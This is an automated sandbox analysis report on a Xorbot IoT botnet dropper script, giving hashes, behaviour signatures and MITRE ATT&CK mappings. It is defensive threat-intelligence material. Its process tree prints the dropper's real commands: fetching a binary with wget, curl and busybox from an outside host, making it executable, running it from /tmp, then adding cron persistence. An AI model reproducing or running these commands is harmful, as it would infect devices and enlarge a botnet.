xorbot | f609f5bfc7e3d5210e05714eb89a2d41b6fbe6c724e36c95db6113c75ebaf1b0

Analysis

max time kernel
138s
max time network
157s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
29-11-2024 15:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

b91e106ff02c3a44407db7510d190b3b
SHA1

9881a6a9fffaeec6083184f37ab1364b6e4024e8
SHA256

f609f5bfc7e3d5210e05714eb89a2d41b6fbe6c724e36c95db6113c75ebaf1b0
SHA512

00aa727b0d4cb91c07fe7b94185a2d0bfee9bceceedd9e7d1d5a21a78659aad3e2181ec672bd5edaa9c10361a66045b7b62a5a8500c0d8e6a06f447907f38c6f
SSDEEP

96:Yswl6Lvcnvc7vcecRcpch3LiQ3auL5RHELFlRKCVSqzLcgZLm3GMDfZrHZhLsGTq:26QkARaSVPLEvhcBXbBtkARaSC

Score

10^/10

xorbot antivm botnet defense_evasion discovery execution persistence privilege_escalatio trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

Processes:

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmod

pid	Process
793	chmod

Executes dropped EXE 1 IoCs

Processes:

HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH

ioc	pid	Process
/tmp/HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH	794	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH

Renames itself 1 IoCs

Processes:

HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH

pid	Process
795	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

crontab

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.Fm7kpz	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curl

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWHcurlcrontab

description	ioc	Process
File opened for reading	/proc/41/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/42/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/114/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/309/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/330/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/7/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/11/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/805/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/143/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/658/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/307/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/5/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/144/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/24/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/175/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/411/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/456/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/657/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/8/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/10/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/103/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/278/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/457/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/27/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/28/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/14/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/146/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/222/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/277/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/6/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/29/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/12/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/22/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/17/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/115/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/318/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/806/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/2/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/16/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/15/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/112/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/154/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/659/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/25/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/288/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/656/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/13/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/612/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/799/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/807/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/20/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/292/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/82/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/291/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/395/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/1/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/43/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/23/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/803/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/804/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/18/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
File opened for reading	/proc/21/cmdline	HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

wgetcurlbusyboxwget

pid	Process
666	wget
672	curl
792	busybox
807	wget

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curl

description	ioc	Process
File opened for modification	/tmp/HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:659
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:664
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
  2⤵
  - System Network Configuration Discovery
  PID:666
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:672
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
  2⤵
  - System Network Configuration Discovery
  PID:792
- /bin/chmod
  chmod 777 HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
  2⤵
  - File and Directory Permissions Modification
  PID:793
- /tmp/HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
  ./HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:794
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:796
  - - /usr/bin/crontab
      crontab -l
      4⤵
      Reads runtime system information
      PID:797
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:800
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:802
- /bin/rm
  rm HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH
  2⤵
  PID:804
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/8YM3ib0RyGWgg6nrmydXaBhxwvhDsrrpJm
  2⤵
  - System Network Configuration Discovery
  PID:807

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/HBTC3hZ9EANvRzlR7CWnfxfwOusb5o6vWH

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/var/spool/cron/crontabs/tmp.Fm7kpz

Filesize
210B

MD5
0b3e99ad95eaf8e27477253897236486

SHA1
864611c03e5df5a9f115fa0eddd20b8bef1bba7d

SHA256
1241a36a74eff73b55d7fde26555dad48b97b92bc4184e77ebef9c61a249e1e2

SHA512
c59422840dbed9e880fa5b274352943ca71cb4d0bdbb0233f7acadc76585f9591bd103b8ff37daf0f1473f5c31c77e2f99cc3073ec7f0f92f6003f209f3081a3

Download Submit